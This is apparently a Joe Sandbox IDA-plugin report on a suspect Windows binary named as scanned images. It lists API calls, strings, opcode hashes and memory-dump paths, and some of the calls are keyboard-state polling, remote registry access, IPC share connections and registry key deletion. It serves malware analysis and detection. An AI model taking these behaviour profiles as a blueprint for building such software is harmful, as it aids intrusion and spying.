• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: cf489ac70dbe222929a01e916e986d0223aaf282a3da5b6b39ba732fdc59d866
• Instruction ID: f7a547cc88f0484564f326d3785ad9d3cad5e6dfb8e3c464cf06534a17d884fd
• Opcode Fuzzy Hash: cf489ac70dbe222929a01e916e986d0223aaf282a3da5b6b39ba732fdc59d866
• Instruction Fuzzy Hash: 5B314CB1A452049FEB25BA3AE945B5F77E9FF00314F214C2BE449D7291DE7DAC808728
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 004B369C
• _wcslen.LIBCMT ref: 004B36A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004B3797
• GetClassNameW.USER32(?,?,00000400), ref: 004B380C
• GetDlgCtrlID.USER32(?), ref: 004B385D
• GetWindowRect.USER32(?,?), ref: 004B3882
• GetParent.USER32(?), ref: 004B38A0
• ScreenToClient.USER32(00000000), ref: 004B38A7
• GetClassNameW.USER32(?,?,00000100), ref: 004B3921
• GetWindowTextW.USER32(?,?,00000400), ref: 004B395D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: 8cf1ad6c6d5655805be56f652a29cfe1c8db0ef10570cedc58dab127f57b3a03
• Instruction ID: a393ade4cd66d8a46d090f496edcd17c06b33806b2ff15418036dac41cf18256
• Opcode Fuzzy Hash: 8cf1ad6c6d5655805be56f652a29cfe1c8db0ef10570cedc58dab127f57b3a03
• Instruction Fuzzy Hash: DF91D471204606AFD714DF26C885BEBF7E8FF44305F00852AF999C6251DB38EA46CBA5
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 004B4994
• GetWindowTextW.USER32(?,?,00000400), ref: 004B49DA
• _wcslen.LIBCMT ref: 004B49EB
• CharUpperBuffW.USER32(?,00000000), ref: 004B49F7
• _wcsstr.LIBVCRUNTIME ref: 004B4A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 004B4A64
• GetWindowTextW.USER32(?,?,00000400), ref: 004B4A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 004B4AE6
• GetClassNameW.USER32(?,?,00000400), ref: 004B4B20
• GetWindowRect.USER32(?,?), ref: 004B4B8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 0a88819e4095ec887ff0bc092aed0a996dcc3184f2ef4f66295a3db99f6563f1
• Instruction ID: 0955c5679972037c7c5f13a03bf203261a001d6e5c3c661feb7cfd4a406a56a3
• Opcode Fuzzy Hash: 0a88819e4095ec887ff0bc092aed0a996dcc3184f2ef4f66295a3db99f6563f1
• Instruction Fuzzy Hash: B891AF710082059BDB04DF24C981BEB77A8FF84714F04846AFE859A297DB38ED45CBB9
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 004DCC64
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 004DCC8D
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 004DCD48
                                                                                  • Part of subcall function 004DCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004DCCAA
                                                                                  • Part of subcall function 004DCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 004DCCBD
                                                                                  • Part of subcall function 004DCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004DCCCF
                                                                                  • Part of subcall function 004DCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 004DCD05
                                                                                  • Part of subcall function 004DCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 004DCD28
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004DCCF3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004C3D40
                                                                                • _wcslen.LIBCMT ref: 004C3D6D
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004C3D9D
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004C3DBE
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 004C3DCE
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004C3E55
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004C3E60
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004C3E6B
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                • String ID: :$\$\??\%s
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 004BE6B4
                                                                                  • Part of subcall function 0046E551: timeGetTime.WINMM(?,?,004BE6D4), ref: 0046E555
                                                                                • Sleep.KERNEL32(0000000A), ref: 004BE6E1
                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 004BE705
                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004BE727
                                                                                • SetActiveWindow.USER32 ref: 004BE746
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004BE754
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004BE773
                                                                                • Sleep.KERNEL32(000000FA), ref: 004BE77E
                                                                                • IsWindow.USER32 ref: 004BE78A
                                                                                • EndDialog.USER32(00000000), ref: 004BE79B
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004BEA5D
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004BEA73
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BEA84
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004BEA96
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004BEAA7
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: SendString$_wcslen
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004B5CE2
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004B5CFB
                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004B5D59
                                                                                • GetDlgItem.USER32(?,00000002), ref: 004B5D69
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004B5D7B
                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004B5DCF
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004B5DDD
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004B5DEF
                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004B5E31
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004B5E44
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004B5E5A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004B5E67
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 00468F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00468BE8,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 00468FC5
                                                                                • DestroyWindow.USER32(?), ref: 00468C81
                                                                                • KillTimer.USER32(00000000,?,?,?,?,00468BBA,00000000,?), ref: 00468D1B
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 004A6973
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 004A69A1
                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 004A69B8
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00468BBA,00000000), ref: 004A69D4
                                                                                • DeleteObject.GDI32(00000000), ref: 004A69E6
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 00469944: GetWindowLongW.USER32(?,000000EB), ref: 00469952
                                                                                • GetSysColor.USER32(0000000F), ref: 00469862
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .G
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0049F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 004B9717
                                                                                • LoadStringW.USER32(00000000,?,0049F7F8,00000001), ref: 004B9720
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0049F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 004B9742
                                                                                • LoadStringW.USER32(00000000,?,0049F7F8,00000001), ref: 004B9745
                                                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 004B9866
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 747408836-2268648507
                                                                                • Opcode ID: 5471274b0e47305e8c153f33303ee4c7ba7ef02495fe2b6e30a9f520719e1efc
                                                                                • Instruction ID: 55f8786621cc57e306468d5a29a48b4544a96885af65105a486904027fa37e11
                                                                                • Opcode Fuzzy Hash: 5471274b0e47305e8c153f33303ee4c7ba7ef02495fe2b6e30a9f520719e1efc
                                                                                • Instruction Fuzzy Hash: EF416D72800219AACF04FBE1CD82DEE7779AF14745F50042AFA0172093EB396F49CB69
                                                                                APIs
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004B07A2
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004B07BE
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004B07DA
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004B0804
                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004B082C
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004B0837
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004B083C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 323675364-22481851
                                                                                • Opcode ID: e417d23966b04780f906bdc60340b58890c9feb36cd3328e95667181f886c13f
                                                                                • Instruction ID: a8fdd161058cac388a9711e60e6392d3f2e99b9359cff6e295eadbc8a72d7e13
                                                                                • Opcode Fuzzy Hash: e417d23966b04780f906bdc60340b58890c9feb36cd3328e95667181f886c13f
                                                                                • Instruction Fuzzy Hash: CA412672C1022CEBDF11EFA4DC958EEB778FF04355B04412AE801A7162EB349E08CBA4
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004D3C5C
                                                                                • CoInitialize.OLE32(00000000), ref: 004D3C8A
                                                                                • CoUninitialize.OLE32 ref: 004D3C94
                                                                                • _wcslen.LIBCMT ref: 004D3D2D
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 004D3DB1
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 004D3ED5
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 004D3F0E
                                                                                • CoGetObject.OLE32(?,00000000,004EFB98,?), ref: 004D3F2D
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 004D3F40
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004D3FC4
                                                                                • VariantClear.OLEAUT32(?), ref: 004D3FD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                • String ID:
                                                                                • API String ID: 429561992-0
                                                                                • Opcode ID: 39c795d25db9862a9efc9449309967d9d2eab13fa72f481e1f20342a3918424d
                                                                                • Instruction ID: bd07497fdada4534849287ae670bc6475fd7d47c0ae97ea5b714053e6819b804
                                                                                • Opcode Fuzzy Hash: 39c795d25db9862a9efc9449309967d9d2eab13fa72f481e1f20342a3918424d
                                                                                • Instruction Fuzzy Hash: 1AC14371608205AFC700DF69C89492BB7E9FF89749F00492EF98A9B351D734EE06CB56
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 004C7AF3
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004C7B8F
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 004C7BA3
                                                                                • CoCreateInstance.OLE32(004EFD08,00000000,00000001,00516E6C,?), ref: 004C7BEF
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004C7C74
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 004C7CCC
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004C7D57
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004C7D7A
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004C7D81
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004C7DD6
                                                                                • CoUninitialize.OLE32 ref: 004C7DDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2762341140-0
                                                                                • Opcode ID: 2d124723fc58a497aed4d363fbfd2b667f8ccbfa2a978eff5ab899dad5cfd927
                                                                                • Instruction ID: eaeec8bde94d3a0caa09499ba946236f22efeb77b36af6b5144bf9494c1b1b79
                                                                                • Opcode Fuzzy Hash: 2d124723fc58a497aed4d363fbfd2b667f8ccbfa2a978eff5ab899dad5cfd927
                                                                                • Instruction Fuzzy Hash: A9C12C75A04109AFCB14DFA4C884DAEBBF9FF48309B1484A9E8169B362D734ED45CF94
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004E5504
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E5515
                                                                                • CharNextW.USER32(00000158), ref: 004E5544
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004E5585
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004E559B
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E55AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CharNext
                                                                                • String ID:
                                                                                • API String ID: 1350042424-0
                                                                                • Opcode ID: 9cda25f5faab7815978d343e2b1e29b92fd1d7ecc7f1d038dc7acb6bcb0d4bb0
                                                                                • Instruction ID: eedb62afef531e1b55957ee59cab66b275ffcfb1beb2d92bc5cc77608397932d
                                                                                • Opcode Fuzzy Hash: 9cda25f5faab7815978d343e2b1e29b92fd1d7ecc7f1d038dc7acb6bcb0d4bb0
                                                                                • Instruction Fuzzy Hash: 1D61D170900689ABDF10DF62CC84AFF3B79EF0532AF104156F915AA291C7388A81DB69
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004AFAAF
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 004AFB08
                                                                                • VariantInit.OLEAUT32(?), ref: 004AFB1A
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004AFB3A
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 004AFB8D
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004AFBA1
                                                                                • VariantClear.OLEAUT32(?), ref: 004AFBB6
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 004AFBC3
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004AFBCC
                                                                                • VariantClear.OLEAUT32(?), ref: 004AFBDE
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004AFBE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: a2a3bfcfb6611f3492075089f19e22f1e34598a70d341ad7c3cac9a3205f6c5e
                                                                                • Instruction ID: a35bde9d339b83017a7c0ee667023fa489de400bc23eff38dcfc9e7ab889c911
                                                                                • Opcode Fuzzy Hash: a2a3bfcfb6611f3492075089f19e22f1e34598a70d341ad7c3cac9a3205f6c5e
                                                                                • Instruction Fuzzy Hash: 8F4154359002199FCB00DFA5C894DAEBBB9FF59344F00807AF915AB262D734A946CFA4
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 004B9CA1
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 004B9D22
                                                                                • GetKeyState.USER32(000000A0), ref: 004B9D3D
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004B9D57
                                                                                • GetKeyState.USER32(000000A1), ref: 004B9D6C
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004B9D84
                                                                                • GetKeyState.USER32(00000011), ref: 004B9D96
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 004B9DAE
                                                                                • GetKeyState.USER32(00000012), ref: 004B9DC0
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 004B9DD8
                                                                                • GetKeyState.USER32(0000005B), ref: 004B9DEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 308fcb22efd9b703ef441386af101f17c80846def5003a8581d0fd3b50219714
                                                                                • Instruction ID: 19bf33a1b318be4de706d4030e505c854cb057c9707c9f55acd857e3c5b548fb
                                                                                • Opcode Fuzzy Hash: 308fcb22efd9b703ef441386af101f17c80846def5003a8581d0fd3b50219714
                                                                                • Instruction Fuzzy Hash: A841B5345047C969FF31867184443E7BEB46F11344F48805BDBC65A7C2D7A8ADC88BBA
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004D05BC
                                                                                • inet_addr.WSOCK32(?), ref: 004D061C
                                                                                • gethostbyname.WSOCK32(?), ref: 004D0628
                                                                                • IcmpCreateFile.IPHLPAPI ref: 004D0636
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004D06C6
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004D06E5
                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 004D07B9
                                                                                • WSACleanup.WSOCK32 ref: 004D07BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: b83b6f0d19d86f1b83841aeb07bc806734e5664a8c690cee327c8e951ff0a8ab
                                                                                • Instruction ID: 817659d399ec20b3d3954ca22a5a7a45a4690ae5a26192372278af9a875d7583
                                                                                • Opcode Fuzzy Hash: b83b6f0d19d86f1b83841aeb07bc806734e5664a8c690cee327c8e951ff0a8ab
                                                                                • Instruction Fuzzy Hash: 18918E35604241AFD320DF15D498F1ABBE0AF44318F1485ABE8698F7A2D738ED46CF96
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 707087890-567219261
                                                                                • Opcode ID: 7d8f4c91d0ca9f7f219186ba2c4430e8942dae3fa5fd50824d83a258e0f41c1a
                                                                                • Instruction ID: f6f79b1b4e9c41acc041ba5b650dd935fa9fcf4cbc6edd67d54037eb4b889b07
                                                                                • Opcode Fuzzy Hash: 7d8f4c91d0ca9f7f219186ba2c4430e8942dae3fa5fd50824d83a258e0f41c1a
                                                                                • Instruction Fuzzy Hash: 9251A171A001169BCB14DF6CC9609BEB7A6BF65724B20422FE826E73C5DB38DD41CB94
                                                                                APIs
                                                                                • CoInitialize.OLE32 ref: 004D3774
                                                                                • CoUninitialize.OLE32 ref: 004D377F
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,004EFB78,?), ref: 004D37D9
